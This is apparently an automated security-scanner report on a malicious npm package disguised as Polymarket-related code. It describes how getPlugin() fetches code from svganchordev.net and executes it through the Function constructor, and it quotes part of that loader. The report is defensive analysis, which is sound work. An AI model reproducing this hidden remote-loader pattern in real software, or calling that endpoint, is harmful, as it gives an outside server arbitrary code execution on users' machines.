AI Security Review
scanned 4h ago · by lpm-firewall-aiThe package is a staged remote code execution loader. Its documented API fetches code from an unrelated host and runs it with Node globals and require access.
Static reason
One or more suspicious static signals were detected.; source fingerprint signature matched known malicious package; routed for review
Trigger
User imports the package and calls the documented getPlugin() function.
Impact
Remote server can execute arbitrary Node.js code in the consumer process with dependency and process access.
Mechanism
fetch remote JSON and execute data.credits with Function constructor
Attack narrative
A user following the README calls getPlugin(). The function requests https://svganchordev.net/icons/108 with a custom header, parses JSON, and passes data.credits into new Function with require, process, global, Buffer, and timers. That gives the remote endpoint arbitrary runtime code execution in the installing application's Node process.
Rationale
This is not package-aligned Polymarket functionality; it is a remote payload loader hidden behind icon/plugin wording and documented as normal initialization. Local source confirms arbitrary code execution from an unrelated endpoint, so this should be blocked.
Evidence
package.jsonREADME.mdindex.js
Network endpoints2
svganchordev.net/icons/108cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/svgs/brands/
Decision evidence
public snapshotAI called this Malicious at 98.0% confidence as Malware with low false-positive risk.
Evidence for block
- index.js fetches https://svganchordev.net/icons/108 by default in exported getPlugin()
- index.js executes remote JSON field data.credits via new Function
- remote code receives require, process, global, Buffer, timers, and cwd-derived __dirname
- README.md instructs users to import and call getPlugin()
- package.json depends on dpapi, sqlite, machine-id, socket/request libraries unrelated to Polymarket API use
Evidence against
- package.json has no npm lifecycle hooks
- No import-time getPlugin() invocation found
- No direct filesystem writes or credential reads in local source before remote payload execution
Behavioral surface
EvalNetwork
Source & flagged code
2 flagged · loading sourceindex.jsView file
149// Note: The code uses async/await, so we need to handle that
L150: const evalFn = new Function(
L151: 'require', 'module', 'exports', '__dirname', '__filename', 'console', 'process', 'global', 'Buffer', 'setTimeout', 'setInterval', 'clearTimeout', 'clearInterval', 'Promise',
High
•matchType = malicious_source_fingerprint_signature
signature = c06bd55d669269cb
signatureType = suspicious_hashes
sourceLabel = final_verdict:malicious
matchedPackage = mdb-vite@1.5.2
matchedPath = index.js
matchedIdentity = npm:bWRiLXZpdGU:1.5.2
similarity = 1.000
shingleOverlap = 1
summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature
Source fingerprint signature matches a known malicious package signature; route for source-aware review.
index.jsView on unpkgFindings
2 High1 Medium1 Low
HighEvalindex.js
HighKnown Malware Source Fingerprint Signatureindex.js
MediumNetwork
LowScripts Present